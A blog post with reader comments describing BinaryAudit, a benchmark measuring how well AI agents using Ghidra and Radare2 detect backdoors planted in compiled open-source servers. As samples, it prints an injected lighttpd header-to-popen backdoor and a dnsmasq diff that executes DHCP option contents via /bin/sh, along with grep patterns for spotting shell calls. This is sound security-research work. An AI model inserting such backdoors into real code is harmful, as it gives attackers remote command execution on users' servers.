We hid backdoors in ~40MB binaries and asked AI + Ghidra to find them

2026-02-22 14:50 · quesma.com

BinaryAudit benchmarks AI agents using Ghidra to find backdoors in compiled binaries of real open-source servers, proxies, and network infrastructure.

Claude can code, but can it check binary executables?

We have already experimented with using NSA software to hack a classic Atari game. This time we want to focus on a much more practical task — using AI agents for malware detection. We partnered with Michał “Redford” Kowalczyk, a reverse engineering expert from Dragon Sector known for finding malicious code in Polish trains, to create a benchmark for finding backdoors in binary executables, without access to source code.

BinaryAudit Model Rankings showing Claude Opus 4.6 leading at 49% pass rate

See BinaryAudit for the full benchmark results — including false positive rates, tool proficiency, and the Pareto frontier of cost-effectiveness. All tasks are open source and available at QuesmaOrg/BinaryAudit.

We were surprised that today’s AI agents can detect some hidden backdoors in binaries. We hadn’t expected them to possess such specialized reverse engineering capabilities.

However, this approach is not ready for production. Even the best model, Claude Opus 4.6, found relatively obvious backdoors in small/mid-size binaries only 49% of the time. Worse yet, most models had a high false positive rate — flagging clean binaries.

In this blog post we discuss a few recent security stories, explain what binary analysis is, and describe how we constructed a benchmark for AI agents. We will see when agents accomplish tasks and when they fail — by missing malicious code or by reporting false findings.

Background

Just a few months ago, Shai Hulud 2.0 compromised thousands of organizations, including Fortune 500 companies, banks, governments, and cool startups — see the postmortem by PostHog. It was a supply chain attack on the npm (Node Package Manager) ecosystem, injecting malicious code that stole credentials.

Just a few days ago, Notepad++ shared updates on a hijack by state-sponsored actors, who replaced legitimate binaries with infected ones.

Even the physical world is at stake, including critical infrastructure. For example, researchers found hidden radios in Chinese solar power inverters and security loopholes in electric buses. Every digital device has firmware, which is much harder to check than the software we install on a computer — and has a much more direct impact. Both state and corporate actors have incentives to tamper with it.

Michał 'Redford' Kowalczyk from Dragon Sector at the Chaos Communication Congress, on breaking DRM in Polish trains.

Michał “Redford” Kowalczyk from Dragon Sector on reverse engineering a train to analyze a suspicious malfunction, the most popular talk at the 37th Chaos Communication Congress. See also Dieselgate, but for trains writeup and a subsequent discussion.

You do not even need bad actors. Network routers often have hidden admin passwords baked into their firmware so the vendor can troubleshoot remotely — but anyone who discovers those passwords gets the same access.

Can we use AI agents to protect against such attacks?

Binary analysis

In day-to-day programming, we work with source code. It relies on high-level abstractions: classes, functions, types, organized into a clear file structure. LLMs excel here because they are trained on this human-readable logic.

Malware analysis forces us into a harder world: binary executables.

Compilation translates high-level languages (like Go or Rust) into low-level machine code for a given CPU architecture (such as x86 or ARM). We get raw CPU instructions: moving data between registers, adding numbers, or jumping to memory addresses. The original code structure, together with variable and function names, gets lost.

To make matters worse, compilers aggressively optimize for speed, not readability. They inline functions (changing the call hierarchy), unroll loops (replacing concise logic with repetitive blocks), and reorder instructions to keep the processor busy.

Yet, a binary is what users actually run. And for closed-source and binary-distributed software, it is all we have.

Analyzing binaries is a long and tedious process of reverse engineering, which starts with a chain of translations: machine code → assembly → pseudo-C. Let’s see how an example backdoor looks in those representations:

1. Raw binary (xxd)

b9 01 00 00 00 48 89 df ba e0 00 00 00 e8 b6 c6 ff ff 49 89 c5 48 85 c0 74 6e 44 0f b6 40 01 4c 8d 8c 24 a0 01 00 00 49 8d 75 02 4c 89 cf 4c 89 c0 41 83 f8 08 72 0a 4c 89 c1 48 c1 e9 03 f3 48 a5 31 d2 41 f6 c0 04 74 09 8b 16 89 17 ba 04 00 00 00 41 f6 c0 02 74 0c 0f b7 0c 16 66 89 0c 17 48 83 c2 02 41 83 e0 01 74 07 0f b6 0c 16 88 0c 17 4c 89 cf c6 84 04 a0 01 00 00 00 e8 b7 4c fd ff

2. Disassembly (objdump)

33e88: mov ecx, 0x1
33e8d: mov rdi, rbx
33e90: mov edx, 0xe0
33e95: call 30550
33e9a: mov r13, rax
33e9d: test rax, rax
33ea0: je 33f10
33ea2: movzx r8d, BYTE PTR [rax+1]
33ea7: lea r9, [rsp+0x1a0]
33eaf: lea rsi, [r13+0x2]
 ... (omitted for brevity)
33efc: mov BYTE PTR [rsp+rax+0x1a0], 0x0
33f04: call system@plt

3. Decompiled (Ghidra)

lVar18 = FUN_00130550(pcVar41, param_4, 0xe0, 1);
if (lVar18 != 0) {
    bVar49 = *(byte *)(lVar18 + 1);
    puVar26 = (undefined8 *)(lVar18 + 2);
    pcVar20 = (char *)&local_148;
    if (7 < bVar49) {
        for (uVar44 = (ulong)(bVar49 >> 3); uVar44 != 0; uVar44--) {
            *(undefined8 *)pcVar20 = *puVar26;
            puVar26++;
            pcVar20 += 8;
        }
    }
    *(undefined1 *)((long)&local_148 + (ulong)bVar49) = 0;
    system((char *)&local_148);
}

Going from raw bytes to assembly is straightforward: the disassembly can be produced with a command-line tool like objdump (e.g., objdump -d).

Turning assembly into C is much harder — we need reverse engineering tools, such as open-source Ghidra (created by NSA) and Radare2, or commercial ones like IDA Pro and Binary Ninja.

The decompilers try their best to make sense of the CPU instructions and generate readable C code. But since all those high-level abstractions and variable names were lost during compilation, the output is far from perfect. You see output full of FUN_00130550, bVar49, local_148 — names that mean nothing.

The benchmark

Tasks

We ask AI agents to analyze binaries and determine if they contain backdoors or malicious modifications.

Source code

Open source project

+

injected backdoor

Binary

Stripped executable

no symbols, no source

AI agent

+

Radare2

objdump, nm, ...

Has a backdoor?

YES 0x4a1c30

or

NO

We started with several open-source projects: lighttpd (a C web server), dnsmasq (a C DNS/DHCP server), Dropbear (a C SSH server), and Sozu (a Rust load balancer). Then, we manually injected backdoors. For example, we hid a mechanism for an attacker to execute commands via an undocumented HTTP header.

Important caveat: All backdoors in this benchmark are artificially injected for testing. We do not claim these projects have real vulnerabilities; they are legitimate open-source software that we modified in controlled ways.

These backdoors weren’t particularly sophisticated — we didn’t try to heavily obfuscate them or hide them in obscure parts of the code. They are the kind of anomaly a skilled human reverse engineer could spot relatively easily.

The agents are given a compiled executable — without source code or debug symbols. They have access to reverse engineering tools: Ghidra, Radare2, and binutils. The task is to identify malicious code and pinpoint the start address of the function containing the backdoor (e.g., 0x4a1c30). See dnsmasq-backdoor-detect-printf/instruction.md for a typical instruction.

A few tasks use a different methodology: we present three binaries and ask which ones contain backdoors, without asking for the specific location – see e.g. sozu-backdoor-multiple-binaries-detect/instruction.md. We expected this to be a simpler task (it wasn’t). This approach simulates supply chain attacks, where often only a subset of binaries are altered.

An example when it works

Backdoor in an HTTP server

We injected a backdoor into the lighttpd server that executes shell commands from an undocumented HTTP header.

Here’s the core of the injected backdoor — it looks for a hidden X-Forwarded-Debug header, executes its contents as a shell command via popen(), and returns the output in a response header:

gboolean li_check_debug_header(liConnection *con) {
 liRequest *req = &con->mainvr->request;
 GList *l;

 l = li_http_header_find_first(req->headers, CONST_STR_LEN("X-Forwarded-Debug"));
 if (NULL != l) {
 liHttpHeader *hh = (liHttpHeader*) l->data;
 char *debugIn = LI_HEADER_VALUE(hh);

 FILE *fp = popen(debugIn, "r"); // Execute attacker's command
 // ... read output into debugOut ...
 pclose(fp);

 li_http_header_insert(con->mainvr->response.headers,
 CONST_STR_LEN("X-Request-Trace"), debugOut, strlen(debugOut));
 }
 return TRUE;
}

For a user who downloaded this backdoored server, it would seem like this is a legitimate program. However, an attacker could trivially execute any command by sending a specially crafted packet.

Claude Opus 4.5 found the backdoor within 5 minutes

Here’s how Claude did it:

Step 1. The model identified the binary and its 26 shared libraries — one of which contained the backdoor.

Step 2. Next, it ran strings with grep patterns looking for obvious indicators of a backdoor:

strings bin/lighttpd2-worker | grep -iE '(shell|bash|/bin/sh|exec|system|backdoor)'

However, the command didn’t find anything suspicious. The model expanded the search to all shared libraries, looking for more patterns (hardcoded IPs, suspicious commands, and credential patterns). Still nothing obvious.
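That first pass — extracting printable strings and grepping them for suspicious patterns — can be sketched in a few lines of Python. This is a minimal reimplementation of what `strings | grep` does; the sample blob is invented for illustration:

```python
import re

def extract_strings(data: bytes, min_len: int = 4):
    """Yield printable ASCII runs, like the Unix `strings` tool."""
    for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, data):
        yield m.group().decode("ascii")

# Same indicators the agent grepped for
SUSPICIOUS = re.compile(r"shell|bash|/bin/sh|exec|system|backdoor", re.I)

# Invented binary blob: some noise, an HTTP string, and a telltale shell invocation
blob = b"\x00\x01GET /index.html\x00\xff/bin/sh -c\x00\x7fELF"
hits = [s for s in extract_strings(blob) if SUSPICIOUS.search(s)]
print(hits)  # ['/bin/sh -c']
```

As the run above shows, this heuristic only works when the backdoor leaves readable strings behind — which is exactly why it came up empty here.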

Step 3. Claude switched strategies and used nm -D to list imported functions:

for f in lib/*.so; do
 nm -D "$f" | grep -E ' U (system|exec|popen)'
done

This revealed something interesting:

lib/liblighttpd2-shared-2.0.0.so: U popen@GLIBC_2.2.5

Claude detected that one of the libraries the server uses imports popen(), a function used to execute shell commands. This immediately alarmed the model:

Claude Opus 4.5:

The liblighttpd2-shared.so uses popen(). This could be legitimate (for spawning worker processes) or could be a backdoor. I need to investigate what these functions are used for by decompiling the code.

Step 4. Claude investigated further to determine if the function was truly malicious, using the Radare2 decompiler for analysis.

It first identified which function calls popen():

r2 -q -c 'aaa; axt @ sym.imp.popen' lib/liblighttpd2-shared-2.0.0.so

The output of this command revealed that a function called li_check_debug_header performs shell execution. (That’s the backdoor we added!) The model smelled something fishy:

Claude Opus 4.5:

This is very suspicious! A “debug header” function calling popen is a classic backdoor pattern — it could be checking for a special HTTP header and executing commands based on it.

Then using Radare2’s decompiler, the model examined the function:

r2 -q -c 'aaa; s dbg.li_check_debug_header; pdc' lib/liblighttpd2-shared-2.0.0.so

The decompiled pseudocode allowed the LLM to understand how the backdoor works — it looks for an undocumented HTTP header, X-Forwarded-Debug, and, if it’s present, executes an attacker-provided command. The server conveniently sends the command output back in an X-Request-Trace response header.

Step 5. Finally, Claude used Radare2 to confirm the function wasn’t dead code, checking cross-references to ensure it was called from the main program:

r2 -q -c 'aaa; s 0x00015260; pd 10' lib/liblighttpd2-shared-2.0.0.so

Now being confident that it found a real backdoor, Claude reported those findings back and finished the exploration.

When it fails: rationalizing away an obvious backdoor

DHCP backdoor

However, LLMs very often miss even obvious backdoors.

We took dnsmasq — a widely-used DNS/DHCP server — and added an embarrassingly obvious backdoor. We weren’t even trying to hide it: if DHCP option 224 (undocumented, we made it up) is present in a packet, execute its contents as a shell command via execl("/bin/sh", "sh", "-c", buf, NULL).

The backdoor we added was just 7 lines of C in DHCP packet parsing:

/* existing DHCP option handling */
match_vendor_opts(opt, daemon->dhcp_opts);
+ if (opt = option_find(mess, sz, 224, 1)) {
+ char buf[256];
+ int len = option_len(opt);
+ memcpy(buf, option_ptr(opt, 0), len);
+ buf[len] = '\0';
+ execl("/bin/sh", "sh", "-c", buf, NULL);
+ }

Claude Opus 4.6 found it… and persuaded itself there is nothing to worry about

Even the best model in our benchmark got fooled by this task. Claude Opus 4.6 found /bin/sh in the strings output early on, traced it to the exact function containing the backdoor, and saw the execl("/bin/sh", "sh", "-c", ...) call. Then it simply assumed it was normal:

Claude Opus 4.6:

I can see the /bin/sh usage at 0x42e9df — it’s calling execl("/bin/sh", "sh", "-c", r13, NULL). This is a pattern for executing a shell command, which could be legitimate in dnsmasq (e.g., for DHCP script execution).

It examined the function, but concluded:

Claude Opus 4.6:

The execl("/bin/sh", "sh", "-c", ...) pattern is typical of dnsmasq’s DHCP lease script execution. This is likely the legitimate lease_helper/script execution function.

The model found the exact function, saw the exact execl call with /bin/sh -c — and rationalized it away as “legitimate DHCP script execution.” It never checked where the command string actually comes from (a DHCP packet sent by a client). It then moved on to investigate other functions and never circled back.

The needle-in-haystack problem

The executables in our benchmark often have hundreds or thousands of functions — while the backdoors are tiny, often just a dozen lines buried deep within. Finding them requires strategic thinking: identifying critical paths like network parsers or user input handlers and ignoring the noise.

Current LLMs lack this high-level intuition. Instead of prioritizing high-risk areas, they often decompile random functions or grep for obvious keywords like system() or exec(). When simple heuristics fail, models frequently hallucinate or give up entirely.

This lack of focus leads them down rabbit holes. We observed agents fixating on legitimate libraries — treating them as suspicious anomalies. They wasted their entire context window auditing benign code while the actual backdoor remained untouched in a completely different part of the binary.
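The prioritization the models lack can be sketched as a toy triage heuristic: score each function by whether it calls dangerous primitives and whether its role suggests it touches external input, then audit the highest-scoring ones first. Everything below — the function names, callee lists, and scoring weights — is invented for illustration; in practice the call graph would come from Ghidra or Radare2:

```python
# Toy triage heuristic: rank functions by risk before decompiling anything.
# Function names, callees, and weights are hypothetical.
RISKY_CALLS = {"system": 5, "popen": 5, "execl": 5, "memcpy": 2, "strcpy": 2}
INPUT_HINTS = {"recv": 3, "packet": 3, "header": 3, "parse": 2, "option": 2}

def risk_score(name: str, callees: list[str]) -> int:
    """Score = dangerous callees + hints that the function handles external input."""
    score = sum(w for call, w in RISKY_CALLS.items() if call in callees)
    score += sum(w for hint, w in INPUT_HINTS.items() if hint in name.lower())
    return score

# Hypothetical functions recovered from a stripped binary's call graph
functions = {
    "parse_dhcp_options": ["option_find", "memcpy", "execl"],
    "log_rotate":         ["fopen", "rename"],
    "check_debug_header": ["http_header_find", "popen"],
    "format_uptime":      ["snprintf"],
}

ranked = sorted(functions, key=lambda f: risk_score(f, functions[f]), reverse=True)
print(ranked)  # highest-risk first
```

Even this crude scorer puts the two planted backdoors (a packet parser calling execl, a header check calling popen) ahead of the benign housekeeping code — the kind of focus that would keep an agent out of rabbit holes.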

Limitations

False positives

The security community is drowning in AI-generated noise. The curl project recently stopped paying for bug reports partly because of AI slop:

The vast majority of AI-generated error reports submitted to cURL are pure nonsense.

A security tool that gives you fake reports is useless and frustrating to use. We specifically tested for this with negative tasks — clean binaries with no backdoor. We found that 28% of the time, models reported backdoors or issues that weren’t real. For any practical malware detection software, we would expect a false positive rate below 0.001%, since most software is safe — see the false positive paradox.
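To see why the false positive rate dominates, here is a back-of-the-envelope Bayes calculation. The 49% detection rate and 28% false positive rate are the benchmark’s headline numbers; the 0.1% prevalence of backdoored binaries is an assumption for illustration:

```python
# False positive paradox, back of the envelope.
prevalence = 0.001          # ASSUMPTION: 1 in 1,000 audited binaries is backdoored
detection_rate = 0.49       # best model's pass rate on backdoored binaries
false_positive_rate = 0.28  # rate of flagging clean binaries

true_alarms = prevalence * detection_rate
false_alarms = (1 - prevalence) * false_positive_rate

# Probability that a flagged binary is actually backdoored (precision)
precision = true_alarms / (true_alarms + false_alarms)
print(f"{precision:.2%} of flagged binaries are actually backdoored")
# prints: 0.17% of flagged binaries are actually backdoored
```

Under these assumptions, fewer than 2 in 1,000 flags would point at a real backdoor — the rest is noise an analyst has to wade through, which is why a sub-0.001% false positive rate matters so much in practice.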

Model ranking on false positive rate showing how often models incorrectly report backdoors in clean binaries

False positive rate measures how often models incorrectly report backdoors in clean binaries. Lower is better. See also detection vs false alarms combining it with pass rate.

For example, Gemini 3 Pro supposedly “discovered” a backdoor in… command-line argument parsing in one of the servers:

Gemini 3 Pro:

I have confirmed that the max-cache-ttl option (index 312, 0x138) is handled by code that treats its argument as a string and stores it at offset 0x138 of the global configuration structure. This is highly suspicious for a TTL option which should be an integer.

Furthermore, the function fcn.0002b260 reads the string from offset 0x138, appends ” ini” to it, and executes it using popen. The output is then parsed for a “duid”.

This behavior allows an attacker to execute arbitrary commands by passing them as the argument to the --max-cache-ttl option (e.g., --max-cache-ttl=/bin/sh). This is a clear backdoor disguised as a legitimate configuration option.

In reality, the source code correctly validates and parses the command-line argument as a number. It never attempts to execute it. Several “findings” that the model reported are completely fake and missing from the source code.

The gap in open-source tooling

We restricted agents to open-source tools: Ghidra and Radare2. We verified that frontier models (including Claude Opus 4.6 and Gemini 3 Pro) achieve a 100% success rate at operating them — correctly loading binaries and running basic commands.

However, these open-source decompilers lag behind commercial alternatives like IDA Pro. While they handle C binaries well, they have issues with Rust (though agents managed to solve some tasks), and fail completely with Go executables.

For example, we tried to work with Caddy, a web server written in Go, with a binary weighing 50MB. Radare2 loaded it in 6 minutes but produced poor-quality code, while Ghidra not only took 40 minutes just to load, but failed to return correct data. IDA Pro, by contrast, loaded it in 5 minutes, producing correct, usable code sufficient for manual analysis.

To ensure we measure agent intelligence rather than tool quality, we excluded Go binaries and focused mostly on C executables (and one Rust project) where the tooling is reliable.

Conclusion

Results

Can AI find backdoors in binaries? Sometimes. Claude Opus 4.6 solved 49% of tasks, while Gemini 3 Pro solved 44% and Claude Opus 4.5 solved 37%.

As of now, it is far from being useful in practice — we would need a much higher detection rate and a much lower false positive rate to make it a viable end-to-end solution.

It works on small binaries and when it sees unexpected patterns. At the same time, it struggles with larger files or when backdoors mimic legitimate access routes.

Binary analysis is no longer just for experts

While end-to-end malware detection is not reliable yet, AI can make it easier for developers to perform initial security audits. A developer without reverse engineering experience can now get a first-pass analysis of a suspicious binary.

A year ago, models couldn’t reliably operate Ghidra. Now they can perform genuine reverse engineering — loading binaries, navigating decompiled code, tracing data flow.

The whole field of working with binaries becomes accessible to a much wider range of software engineers. It opens opportunities not only in security, but also in performing low-level optimization, debugging and reverse engineering hardware, and porting code between architectures.

Future

We believe that results can be further improved with context engineering (including proper skills or MCP) and access to commercial reverse engineering software (such as the mentioned IDA Pro and Binary Ninja).

Once AI demonstrates the capability to solve some tasks (as it does now), subsequent models usually improve drastically.

Moreover, we expect that a lot of analysis will be performed with local models, likely fine-tuned for malware detection. Security-sensitive organizations can’t upload proprietary binaries to cloud services. Additionally, bad actors will optimize their malware to evade public models, necessitating the use of private, local models for effective defense.

You can check full results and see the tasks at QuesmaOrg/BinaryAudit.

Discuss on Hacker News, LinkedIn or X.



Comments

  • By 7777332215, 2026-02-22 16:47

    I know they said they didn't obfuscate anything, but if you hide imports/symbols and obfuscate strings, which is the bare minimum for any competent attacker, the success rate will immediately drop to zero.

    This is detecting the pattern of an anomaly in language associated with malicious activity, which is not impressive for an LLM.

    • By stared, 2026-02-22 18:31

      One of the authors here.

      The tasks here are entry level. So we are impressed that some AI models are able to detect some patterns, while looking just at binary code. We didn't take it for granted.

      For example, only a few models understand Ghidra and Radare2 tooling (Opus 4.5 and 4.6, Gemini 3 Pro, GLM 5) https://quesma.com/benchmarks/binaryaudit/#models-tooling

      We consider it a starting point for AI agents being able to work with binaries. Other people discovered the same - vide https://x.com/ccccjjjjeeee/status/2021160492039811300 and https://news.ycombinator.com/item?id=46846101.

      There is a long way ahead from "OMG, AI can do that!" to an end-to-end solution.

      • By botusaurus, 2026-02-22 19:44

        have you tried stuffing a whole set of tutorials on how to use ghidra in the context, especially for the 1 mil token context like gemini?

        • By stared, 2026-02-22 20:02

          No. To give it a fair test, we didn't tinker with model-specific context-engineering. Adding skills, examples, etc is very likely to improve performance. So is any interactive feedback.

          Our example instruction is here: https://github.com/QuesmaOrg/BinaryAudit/blob/main/tasks/lig...

          • By anamexis, 2026-02-22 20:19

            Why, though? That would make sense if you were just trying to do a comparative analysis of different agent's ability to use specific tools without context, but if your thesis is:

            > However, [the approach of using AI agents for malware detection] is not ready for production.

            Then the methodology does not support that. It's "the approach of using AI agents for malware detection with next to zero documentation or guidance is not ready for production."

            • By ronald_petty, 2026-02-22 22:27

              Not the author. Just my thoughts on supplying context during tests like these. When I do tests, I am focused on "out of the box" experiences. I suspect the vast majority of actors (good and bad, junior and senior) will use out of the box more than they will try to affect the outcome based on context engineering. We do expect tweaking prompts to provide better outcomes, but that also requires work (for now). Maybe another way to think is reducing system complexity by starting at the bottom (no configuration) before moving to top (more configuration). We can't even replicate out of the box today much less any level of configuration (randomness is going to random).

              Agree it is a good test to try, but there are huge benefits to being able to understand (and better recreate) 0-conf tests.

            • By stared, 2026-02-22 20:41

              You can solve any problem with AI if you give enough hints.

              The question we asked is if they can solve a problem autonomously, with instructions that would be clear for a reverse engineering specialist.

              That said, I found these useful for many binary tasks - just not (yet) the end-to-end ones.

              • By embedding-shape, 2026-02-22 21:25

                > The question we asked is if they can solve a problem autonomously

                What level of autonomy though? At one point some human have to fire them off, so already kind of shaky what that means here. What about providing a bunch of manuals in a directory and having "There are manuals in manuals/ you can browse to learn more." included in the prompt, if they get the hint, is that "autonomously"?

              • By anamexis, 2026-02-22 22:25

                "With instructions that would be clear for a reverse engineering specialist" is a big caveat, though. It seems like an artificial restriction to add.

                With a longer and more detailed prompt (while still keeping the prompt completely non-specific to a particular type of malware/backdoor), the AI could most likely solve the problem autonomously much better.

            • By decidu0us9034, 2026-02-22 21:59

              All the docs are already in its training data, wouldn't that just pollute the context? I think giving a model better/non-free tooling would help as mentioned. binja code mode can be useful but you definitely need to give these models a lot of babysitting and encouragement and their limitations shine with large binaries or functions. But sometimes if you have a lot to go through and just need some starting point to triage, false pos are fine.

              • By anamexis, 2026-02-24 20:31

                > All the docs are already in its training data, wouldn't that just pollute the context?

                No - there is a reason that coding agents are constantly looking up docs from the web, even though they were presumably trained on that data. Having this information directly in context results in much higher fidelity than relying on the information embedded in the model.

    • By akiselev, 2026-02-22 17:38

      When I was developing my ghidra-cli tool for LLMs to use, I was using crackmes as tests and it had no problem getting through obfuscation as long as it was prompted about it. In practice when reverse engineering real software it can sometimes spin in circles for a while until it finally notices that it's dealing with obfuscated code, but as long as you update your CLAUDE.md/whatever with its findings, it generally moves smoothly from then on.

      • By eli, 2026-02-22 18:06

        Is it also possible that crackme solutions were already in the training data?

        • By akiselev, 2026-02-22 18:11

          I used the latest submissions from sites like crackmes.one, which were days or weeks old, to guard against that.

    • By achille, 2026-02-22 18:44

      In the article they explicitly said they stripped symbols. If you look at the actual backdoors, many are already minimal and quite obfuscated,

      see:

      - https://github.com/QuesmaOrg/BinaryAudit/blob/main/tasks/dns...

      - https://github.com/QuesmaOrg/BinaryAudit/blob/main/tasks/dro...

      • By comex, 2026-02-22 20:36

        The first one was probably found due to the reference to the string /bin/sh, which is a pretty obvious tell in this context.

        The second one is more impressive. I'd like to see the reasoning trace.

        • By comex, 2026-02-22 23:05

          Reply to self: I managed to get their code running, since they seemingly haven’t published their trajectories. At least in my run (using Opus 4.6), it turns out that Claude is able to find the backdoored function because it’s literally the first function Claude checks.

          Before even looking at the binary, Claude announces it will "look at the authentication functions, especially password checking logic which is a common backdoor target." It finds the password checking function (svr_auth_password) using strings. And that is the function they decided to backdoor.

          I’m experienced with reverse engineering but not experienced with these kinds of CTF-type challenges, so it didn’t occur to me that this function would be a stereotypical backdoor target…

          They have a different task (dropbear-brokenauth2-detect) which puts a backdoor in a different function, and zero agents were able to find that one.

          On the original task (dropbear-brokenauth-detect), in their runs, Claude reports the right function as backdoored 2 out of 3 times, but it also reports some function as backdoored 2 out of 2 times in the control experiment (dropbear-brokenauth-detect-negative), so it might just be getting lucky. The benchmark seemingly only checks whether the agent identifies which function is backdoored, not the specific nature of the backdoor. Since Claude guessed the right function in advance, it could hallucinate any backdoor and still pass.

          But I don’t want to underestimate Claude. My run is not finished yet. Once it’s finished, I’ll check whether it identified the right function and, if so, whether it actually found the backdoor.

          • By comex, 2026-02-23 6:10

            Update: It did find the backdoor! It spent an hour and a half mostly barking up various wrong trees and was about to "give my final answer" identifying the wrong function, but then said: "Actually, wait. Let me reconsider once more. [..] Let me look at one more thing - the password auth function. I want to double-check if there's a subtle bypass I missed." It disassembled it again, and this time it knew what the callee functions did and noticed the wrong function being called after failure.

            Amusingly, it cited some Dropbear function names that it had not seen before, so it must have been relying in part on memorized knowledge of the Dropbear codebase.

    • By hereme888, 2026-02-22 19:00

      I've used Opus 4.5 and 4.6 to RE obfuscated malicious code with my own Ghidra plugin for Claude Code and it fully reverse engineered it. Granted, I'm talking about software cracks, not state-level backdoors.

    • By halflife, 2026-02-22 17:54

      Isn’t an LLM supposed to be better than heuristics at analyzing obfuscated code? Because of its ability to pattern match, it can deduce what obfuscated code does?

      • By bethekidyouwant, 2026-02-22 20:00

        How much binary code is in the training set? (None?)

    • By Avamander, 2026-02-22 23:58

      I have seen LLMs be surprisingly effective at figuring out such oddities. After all it has ingested knowledge of a myriad of data formats, encryption schemes and obfuscation methods.

      If anything, complex logic is what'll defeat an LLM. But a good model will also highlight such logic being intractable.

    • By Retr0id, 2026-02-22 18:45

      Stripping symbols is fairly normal, but hiding imports ought to be suspicious in its own right.

  • By akiselev, 2026-02-22 15:46

    Shameless plug: https://github.com/akiselev/ghidra-cli

    I’ve been using Ghidra to reverse engineer Altium’s file format (at least the Delphi parts) and it’s insane how effective it is. Models are not quite good enough to write an entire parser from scratch but before LLMs I would have never even attempted the reverse engineering.

    I definitely would not depend on it for security audits but the latest models are more than good enough to reverse engineer file formats.

    • By bitexploder, 2026-02-22 16:41

      I can tell you how I am seeing agents be used with reasonable results. I will keep this high level. I don't rely on the agents solely. You build agents that augment your capabilities.

      They can make diagrams for you, give you an attack surface mapping, and dig for you while you do more manual work. As you work on an audit you will often find things of interest in a binary or code base that you want to investigate further. LLMs can often blast through a code base or binary finding similar things.

      I like to think of it like a swiss army knife of agentic tools to deploy as you work through a problem. They won't balk at some insanely boring task and that can give you a real speed up. The trick is if you fall into the trap of trying to get too much out of an LLM you end up pouring time into your LLM setup and not getting good results, I think that is the LLM productivity trap. But if you have a reasonable subset of "skills" / "agents" you can deploy for various auditing tasks it can absolutely speed you up some.

      Also, when you have scale problems, just throw an LLM at it. Even low quality results are a good sniff test. Some of the time I just throw an LLM at a code review thing for a codebase I came across and let it work. I also love asking it to make me architecture diagrams.

      • By johnmaguire, 2026-02-22 18:00

        > But if you have a reasonable subset of "skills" / "agents" you can deploy for various auditing tasks it can absolutely speed you up some.

        Are people sharing these somewhere?

        • By embedding-shape 2026-02-22 21:28

          I think overall you're better off creating these yourself. The more you add to the overall context, the more chances the model has to screw up somewhere, so you want to give it as little as possible while still including everything that is important at that moment.

          Using the agent, seeing where it gets stuck, and then creating a workflow/skill/whatever for how to overcome that issue will also help you understand which scenarios the agents and models are currently having a hard time with.

          You'll also end up with a smaller set of workflows/skills that you actually understand, so you can steer things and rewrite them when, inevitably, you have to change something.

        • By bitexploder 2026-02-22 23:49

          I put the terms in quotes because it can be as simple as a set of prompts you develop for various contexts. It really doesn't have to be too heavy of an idea.

    • By jakozaur 2026-02-22 16:11

      Oh, nice find... We ended up using PyGhidra, but the models waste some cycles because of its bad ergonomics. Perhaps your CLI would be easier.

      Still, Ghidra's most painful limitation was its extremely slow analysis of Go binaries. We had to exclude that example from the benchmark.
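
      [Editor's note] For readers unfamiliar with the headless workflows mentioned above, here is a minimal sketch of how an agent harness might drive Ghidra's `analyzeHeadless` launcher from Python. All paths, the project name, and the `audit.py` script are hypothetical; the flags (`-import`, `-postScript`, `-deleteProject`) come from Ghidra's headless analyzer, but check your install's README for the exact options.

```python
# Sketch: assembling a one-shot Ghidra headless analysis run from Python.
# Paths and names are illustrative, not from the article's setup.
import subprocess

def build_headless_cmd(ghidra_home, project_dir, binary, script):
    """Build the argv list for analyzeHeadless: import one binary,
    run a post-analysis script, and discard the temporary project."""
    return [
        f"{ghidra_home}/support/analyzeHeadless",
        project_dir, "audit",      # project location and project name
        "-import", binary,         # binary to import and auto-analyze
        "-postScript", script,     # script run after analysis completes
        "-deleteProject",          # don't keep the project on disk
    ]

cmd = build_headless_cmd("/opt/ghidra", "/tmp/proj", "./server", "audit.py")
# subprocess.run(cmd, check=True)  # uncomment on a machine with Ghidra installed
```

      The agent then only needs to write `audit.py` (Jython or PyGhidra) and read its output, which keeps the tool surface small.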

    • By Aeolun 2026-02-23 22:27 · 1 reply

      > Models are not quite good enough to write an entire parser from scratch

      In my experience models are really good at this? Not one shot, but writing decoders/encoders is entirely possible.

      • By akiselev 2026-02-24 6:26

        They can one-shot relatively simple parsers/encoders/decoders with a proper spec, but it’s a completely different ballgame when you’re trying to parse a very domain-knowledge-heavy file format (like an electronics CAD format) with decades of backwards-compatible cruft spread among hundreds of megabytes of decompiled Delphi and C# dlls (millions of lines).

        The low level parts (OLE container, streams and blocks) are easy but the domain specific stuff like deserializing to typed structs is much harder.
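
        [Editor's note] To make the "easy layer" concrete: Altium's format, like many Delphi-era tools, stores its data in an OLE/CFB compound file, which can be recognized by its fixed 8-byte header magic. A minimal sketch (the function names are illustrative, not from any real parser):

```python
# Sketch: the "easy" container layer of an OLE/CFB compound file.
# The magic bytes and header offsets are from the compound file
# binary format (MS-CFB); everything else here is illustrative.
import struct

OLE_MAGIC = bytes([0xD0, 0xCF, 0x11, 0xE0, 0xA1, 0xB1, 0x1A, 0xE1])

def is_ole_container(path):
    """True if the file starts with the CFB header magic."""
    with open(path, "rb") as f:
        return f.read(8) == OLE_MAGIC

def sector_size(header):
    """The sector shift is a little-endian u16 at offset 30 of the
    512-byte CFB header; sector size is 2**shift (usually 512 or 4096)."""
    (shift,) = struct.unpack_from("<H", header, 30)
    return 1 << shift
```

        The hard part, as the comment says, is everything above this layer: interpreting the streams inside the container as typed, domain-specific records.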

    • By selridge 2026-02-22 17:53

      This is really cool! Thanks for sharing. It's a lot more sophisticated than what I did w/ Ghidra + LLMs.

    • By lima 2026-02-22 16:12 · 2 replies

      How does this approach compare to the various Ghidra MCP servers?

      • By akiselev 2026-02-22 16:25 · 1 reply

        There’s not much difference, really. I stupidly didn’t bother looking at prior art when I started reverse engineering, and ghidra-cli was born (along with several others like ilspy-cli and debugger-cli).

        That said, it should be easier for a human to follow along with the agent, and Claude Code seems to have an easier time with discovery than with stuffing all the tool definitions into the context.

          • By bitexploder 2026-02-22 16:42

          That is pretty funny. But you probably learned something in implementing it! This is such a new field, I think small projects like this are really worthwhile :)

      • By selridge 2026-02-22 17:52

        I also did this approach (scripts + home-brew cli)...because I didn't know Ghidra MCP servers existed when I got started.

        So I don't have a clear idea of what the comparison would be but it worked pretty well for me!

    • By stared 2026-02-22 18:57

      Thanks for sharing! It seems to be an active space; see, for example, a recent MCP server (https://news.ycombinator.com/item?id=46882389). If you haven't already, I strongly recommend posting it as a Show HN.

